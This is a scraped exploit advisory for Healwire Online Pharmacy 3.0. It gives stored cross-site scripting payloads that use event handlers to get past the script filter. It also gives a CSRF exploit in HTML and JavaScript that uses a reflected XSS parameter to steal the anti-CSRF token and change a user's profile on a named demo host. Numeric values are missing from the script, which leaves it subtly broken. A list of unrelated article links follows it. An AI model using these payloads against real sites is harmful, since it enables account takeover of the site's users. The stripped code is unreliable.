Healwire Online Pharmacy version 3.0 suffers from cross site request forgery and cross site scripting vulnerabilities.

tags | exploitvulnerabilityxsscsrf

MD5 | 9196695291014c0d67db9bdd80d678ff

# Exploit Title: Healwire Online Pharmacy 3.0 - Persistent Cross-Site Scripting / Cross-Site Request Forgery
# Date: --
# Exploit Author: L0RD
# Vendor Homepage: https://codecanyon.net/item/healwire-online-pharmacy/16423338?s_rank=1499
# Version: 3.0
# Tested on: windows # POC : Cross site scripting :
) Create an account and go to your profile.
) When we want to put "<script></script>" in the fields,"script" will be
replaced with null.
so we can bypass this filter by using javascript's events like
"onmouseover" or "oninput" .
Put one of these payloads into the fields :
- " oninput=alert('xss') "
- " onmouseover=alert('xss') "
) You will get an alert box inside the page . ( after put something into
the fields or move mouse on the fields) # POC : Cross-Site request forgery :
# With csrf vulnerability,attacker can easily change user's authentication.
# So in this script , we have anti-CSRF token .We can't change user's
# information without token.
# but there is a vulnerable parameter which has reflected xss in another page
# of this script.
# http://store.webandcrafts.com/demo/healwire/?msg= [We have Reflected XSS here]
# Now we can bypass anti-csrf by this parameter and using javascript: # Exploit : "/><form action="
http://store.webandcrafts.com/demo/healwire/user/update-details-user/1"
method="POST">
<input type="hidden" name="first_name" value="a" />
<input type="hidden" name="address"
value="" oninput=alert(document.domain) ""
/>
<input type="hidden" name="pincode" value="a" />
<input type="hidden" name="phone" value="" />
<input type="hidden" name="last_name" value="anything" />
<input type="hidden" name="_token" value="" />
</form>
<script>
var token = ' ';
var req = new XMLHttpRequest();
req.onreadystatechange = function(){
if(this.readyState == && this.status == ){
var secPage = this.responseXML;
token = secPage.forms[].elements[].value;
console.log(token);
}
}
req.open("GET","/demo/healwire/account-page",true);
req.responseType = "document";
req.send(); window.setTimeout(function(){
document.forms[].elements[].value = token;
document.forms[].submit();
},)
</script> # You can also send ajax requests instead of using form .
# Encode this payload and put this into "msg" parameter
# JSON result after seconds : status "SUCCESS"
msg "User profile updated !"

Healwire Online Pharmacy 3.0 Cross Site Request Forgery / Cross Site Scripting的更多相关文章

  1. WebGoat学习——跨站请求伪造(Cross Site Request Forgery (CSRF))

    跨站请求伪造(Cross Site Request Forgery (CSRF)) 跨站请求伪造(Cross Site Request Forgery (CSRF))也被称为:one click at ...

  2. Cross Site Request Forgery (CSRF)--spring security -转

    http://docs.spring.io/spring-security/site/docs/3.2.0.CI-SNAPSHOT/reference/html/csrf.html 13. Cross ...

  3. 跨站请求伪造(Cross Site Request Forgery (CSRF))

    跨站请求伪造(Cross Site Request Forgery (CSRF)) 跨站请求伪造(Cross Site Request Forgery (CSRF)) 跨站请求伪造(Cross Sit ...

  4. DVWA 黑客攻防演练(十四)CSRF 攻击 Cross Site Request Forgery

    这么多攻击中,CSRF 攻击,全称是 Cross Site Request Forgery,翻译过来是跨站请求伪造可谓是最防不胜防之一.比如删除一篇文章,添加一笔钱之类,如果开发者是没有考虑到会被 C ...

  5. CSRF(Cross Site Request Forgery, 跨站域请求伪造)

    CSRF(Cross Site Request Forgery, 跨站域请求伪造) CSRF 背景与介绍 CSRF(Cross Site Request Forgery, 跨站域请求伪造)是一种网络的 ...

  6. CSRF(Cross Site Request Forgery, 跨站请求伪造)

    一.CSRF 背景与介绍 CSRF(Cross Site Request Forgery, 跨站域请求伪造)是一种网络的攻击方式,它在 2007 年曾被列为互联网 20 大安全隐患之一.其他安全隐患, ...

  7. 转: CSRF(Cross Site Request Forgery 跨站域请求伪造) 背景与介绍

    from:  https://www.ibm.com/developerworks/cn/web/1102_niugang_csrf/   在 IBM Bluemix 云平台上开发并部署您的下一个应用 ...

  8. CSRF Laravel Cross Site Request Forgery protection¶

    Laravel 使得防止应用 遭到跨站请求伪造攻击变得简单. Laravel 自动为每一个被应用管理的有效用户会话生成一个 CSRF "令牌",该令牌用于验证授权用 户和发起请求者 ...

  9. Vulnerability: Cross Site Request Forgery (CSRF)

    CSRF跨站请求伪造 这是一种网络攻击方式,也被称为one-click attack或者session riding 攻击原理 CSRF攻击利用网站对于用户网页浏览器的信任,挟持用户当前已登陆的Web ...

随机推荐

  1. javaScript(4)---数据类型

    javaScript(4)---数据类型 第4章 数据类型 学习要点: 1.typeof操作符 2.Undefined类型 3.Null类型 4.Boolean类型 5.Number类型 6.Stri ...

  2. access窗口标签居中

    Private Sub Form_Resize() On Error Resume Next Me.Width = Me.InsideWidth Me.Section(acDetail).Height ...

  3. 电商网站开发记录(三) Spring的引入,以及配置详解

    1.web.xml配置注解<?xml version="1.0" encoding="UTF-8"?><web-app xmlns:xsi=& ...

  4. JavaScript 中的undefined and null 学习

    JavaScript 中的undefined and null learn record from the definitive guide to html5 JavaScript 中有两个特殊值:u ...

  5. JS实现数组去重的6种方法总结

    方法一: 双层循环,外层循环元素,内层循环时比较值,如果有相同的值则跳过,不相同则push进数组. Array.prototype.distinct = function(){ var arr = t ...

  6. 学习CountDownLatch

    对比 使用CyclicBarrier 上次用Barrier方式实现了线程等待一组完成,这次用CountDownLatch来实现 我的理解CountDownLatch 采用的方式是计数器方式,每执行完一 ...

  7. 卸载重装Mysql

    卸载重装前请备份数据库 卸载 sudo apt autoremove --purge mysql-server-core-5.7 清理残留 sudo rm -r /var/lib/mysql* sud ...

  8. 【转】简单了介绍js中的一些概念(词法结构) 和 数据类型(部分)。

    1 , javascript字符集: javascript采用的是Unicode字符集编码. 为什么要采用这个编码呢? 原因很简单,16位的Unicode编码可以表示地球人的任何书面语言.这是语言 国 ...

  9. Python_回调函数

    import os import stat def remove_readonly(func,path): #定义回调函数 os.chmod(path,stat.S_IWRITE) #删除文件的只读文 ...

  10. mysql数据库死锁的产生原因及解决办法

    这篇文章主要介绍了mysql数据库锁的产生原因及解决办法,需要的朋友可以参考下   数据库和操作系统一样,是一个多用户使用的共享资源.当多个用户并发地存取数据 时,在数据库中就会产生多个事务同时存取同 ...